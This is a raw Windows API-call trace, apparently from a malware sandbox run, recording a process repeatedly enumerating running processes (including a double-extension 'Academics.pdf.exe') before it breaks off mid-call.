1 [0282.414] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0282.415] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0282.416] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0282.417] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.417] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0282.418] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0282.419] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0282.420] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0282.421] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0282.422] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0282.424] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0282.425] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0282.426] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0282.427] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0282.428] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0282.429] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0282.429] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0282.430] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0282.431] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0282.432] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0282.433] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0282.434] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0282.435] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0282.435] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.436] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.437] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0282.438] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.439] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0282.440] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.441] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0282.442] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0282.443] CloseHandle (hObject=0x294) returned 1 [0282.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0282.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0282.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0282.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0282.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0282.443] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0282.443] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0282.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0282.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0282.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0282.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0282.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0282.443] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0282.446] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.447] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0282.447] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0282.448] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.449] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0282.450] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.451] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0282.452] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0282.453] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0282.453] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0282.454] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.455] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.456] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.457] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.458] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.459] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0282.460] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.461] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.462] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0282.462] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0282.463] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0282.464] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0282.465] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.466] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0282.467] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0282.468] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0282.469] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0282.469] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0282.470] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0282.471] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0282.472] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0282.473] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0282.474] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0282.474] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0282.475] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0282.476] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0282.477] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0282.478] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0282.479] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0282.479] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0282.480] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0282.481] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0282.482] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.483] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.484] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0282.484] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.486] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0282.487] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: 